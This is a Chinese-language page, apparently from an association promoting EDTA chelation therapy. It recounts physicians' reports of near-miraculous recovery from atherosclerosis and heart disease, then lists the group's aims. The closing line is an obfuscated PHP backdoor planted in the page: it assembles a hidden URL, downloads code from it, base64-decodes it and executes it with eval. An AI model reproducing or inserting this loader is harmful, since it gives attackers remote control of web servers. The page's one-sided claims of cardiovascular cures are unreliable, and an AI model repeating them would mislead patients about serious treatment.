收藏本站
任務 列印 E-mail


螯合療法進入醫療體系,醫學先驅投入鑽研療效。

    根據可靠且值得信任的醫學期刊記載:西元 一九五○ 年 代,最早投入研究 EDTA 螯合療法的兩位專業學者,一位是底特律 Wayne 州立大學的化學教授亞伯特(Dr.Albert J.Boyle), 另一位是同所大學裡、當代最知名的心臟內科教授戈登(Dr. Gordon B.Myers)。

他們嘗試跟在主流醫學中已被放棄且走投無路的病人溝通,並建議他們使用 EDTA 螯合療法,來改善嚴重的動脈硬化與心血管疾病。

    起初,幾次治療後的效果雖然沒有想像中的好, 但持續治療後,卻出現奇蹟似的轉變。

他們發現被宣告不治的心臟功能衰敗患者,竟能有明顯的回復,而且疼痛的感覺減少,使得止痛藥隨之減量,血流量增加,使得他們四肢回暖而膚色也紅潤起來,還有運動的持續力變好,也沒有出現呼吸急促或胸痛的症狀……。

這些改變,讓兩位教授及受惠的患者都高興不已。

    接著,西元 一九六○ 年代任職於美國西北大學醫學院的艾佛烈醫師(Dr.Alferd Soffer)更於其著作中明確表示:「重覆使用 EDTA 螯合療法,可以明顯地改善動脈硬化,以及因周邊血管阻塞所造成的腳痛,特別是糖尿病患者。」

    這 一 切 ,在經過精通「非侵入性放射同位素檢查」的 Dr.Casdorph 確認後表示,動脈硬化的病人在使用 EDTA 螯合療 法之後,已明顯的改善心臟功能,並增加了腦部血流量,同樣的檢查運用在頸動脈的結果亦是如此!

此外,Dr.McDonagh 運用眼球壓力的變化,來測知眼球後動脈壓力的方法(因為眼球與腦部在生理結構上是一個整體,所以眼睛可以反映出腦部的循環),也獲得如 Dr.Casdorph 一樣的結果。

其餘一般健康指數如:肝功能、高血壓、膽固醇、紅血球與白血球數等,都在客觀而精準的檢測下獲得了轉佳的數據。

本會之任務:一、研究螯合療法之理論基礎與臨床療效。
                         二、推廣預防醫學及健康照護養生觀念。
                         三、正確的螯合療法學理基礎與臨床研究,從事螯合療法推廣教育。

 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));